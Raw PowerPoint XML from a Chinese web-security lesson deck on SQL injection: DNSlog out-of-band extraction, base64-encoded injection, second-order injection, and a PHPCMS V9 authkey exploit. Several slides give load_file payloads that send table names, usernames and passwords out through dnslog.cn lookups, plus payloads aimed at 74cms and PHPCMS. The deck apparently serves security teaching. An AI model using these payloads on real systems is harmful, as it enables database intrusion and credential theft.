              <a:t>dnslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>平台查询，就会记录我们的语句查询结果，从而快速提升延迟注入速度。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>条件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权限（要借助</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数）</a:t>
            </a:r>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dns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入列表名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='jian' limit 0,1),'.tunxf1.dnslog.cn\\abc'))),1,1)--+	#查表名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='xycms' limit 0,1),'.7dluss.dnslog.cn\\abc'))),1,1)--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='xycms' limit 1,1),'.7dluss.dnslog.cn\\abc'))),1,1)--+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dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入列列名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>列列名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='user' limit 0,1),'.7dluss.dnslog.cn\\abc'))),1,1)--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='user' and TABLE_SCHEMA='dbname' limit 0,1),'.7dluss.dnslog.cn\\abc'))),1,1)--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>第二个列名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='user' limit 1,1),'.7dluss.dnslog.cn\\abc'))),1,1)--+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dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入列数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>列数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>and if((select load_file(concat('\\\\',(select username from user limit 0,1),'.7dluss.dnslog.cn\\abc'))),1,1)--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>and if((select load_file(concat('\\\\',(select password from user limit 0,1),'.7dluss.dnslog.cn\\abc'))),1,1)--+</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flipV="1">
            <a:off x="1664970" y="4050665"/>
            <a:ext cx="8407400" cy="5715"/>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758950" y="2031365"/>
            <a:ext cx="8468995" cy="1905"/>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067810" y="2840355"/>
            <a:ext cx="5627370" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> BASE64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>编码注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>构造语句</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$id=base64_decode($id);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flipV="1">
            <a:off x="1664970" y="4050665"/>
            <a:ext cx="8407400" cy="5715"/>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758950" y="2031365"/>
            <a:ext cx="8468995" cy="1905"/>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067810" y="2840355"/>
            <a:ext cx="5627370" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>二阶注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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二阶注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888762" y="1854436"/>
            <a:ext cx="10280591" cy="4170349"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL注入一般可分为两种，一阶注入（普通的SQL注入）和二阶SQL注入。一阶SQL注入发生在一个HTTP请求和响应中，系统对攻击输入立即反应执行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>一阶注入的攻击过程归纳如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>1 攻击者在HTTP请求中提交恶意sql语句。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>2 应用处理恶意输入，使用恶意输入动态构建SQL语句。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>3 如果攻击实现，在响应中向攻击者返回结构。</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二阶注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="87500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二阶注入，作为sql注入的一种，他不同于普通的SQL注入，恶意代码被注入到web应用中不立即执行，而是存储到后端数据库，在处理另一次不同请求时，应用检索到数据库中的恶意输入并利用它动态构建SQL语句，实现了攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二阶SQL注入的攻击过程归纳如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1 攻击者在一个HTTP请求中提交恶意输入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2 用于将恶意输入保存在数据库中。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3 攻击者提交第二个HTTP请求。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4 为处理第二个HTTP请求，应用检索存储在后端数据库中的恶意输入，动态构建SQL语句。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5 如果攻击实现，在第二个请求的响应中向攻击者返回结果。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>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flipV="1">
            <a:off x="1664970" y="4050665"/>
            <a:ext cx="8407400" cy="5715"/>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758950" y="2031365"/>
            <a:ext cx="8468995" cy="1905"/>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067810" y="2840355"/>
            <a:ext cx="5627370" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>各种提交方式注入的挖掘</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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二阶注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一般攻击利用是两种方式：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击存储</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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二阶注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>74cms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>人才系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>简历填写中存在二阶注入  aa',`fullname`=user()#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1146810" y="3267710"/>
            <a:ext cx="4539615" cy="2667635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6612890" y="3267710"/>
            <a:ext cx="4655820" cy="225425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flipV="1">
            <a:off x="1664970" y="4050665"/>
            <a:ext cx="8407400" cy="5715"/>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758950" y="2031365"/>
            <a:ext cx="8468995" cy="1905"/>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067810" y="2840355"/>
            <a:ext cx="5627370" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> PHPV9 authkey </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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phpv9 authkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>爆出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>authkey</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>phpsso_server/index.php?m=phpsso&amp;c=index&amp;a=getapplist&amp;auth_data=v=1&amp;appid=1&amp;data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>然后本地构造注入页面进行注入</a:t>
            </a:r>
          </a:p>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flipV="1">
            <a:off x="1664970" y="4050665"/>
            <a:ext cx="8407400" cy="5715"/>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758950" y="2031365"/>
            <a:ext cx="8468995" cy="1905"/>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067810" y="2840355"/>
            <a:ext cx="5627370" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART </a:t>
            </a:r>
            <a:r>
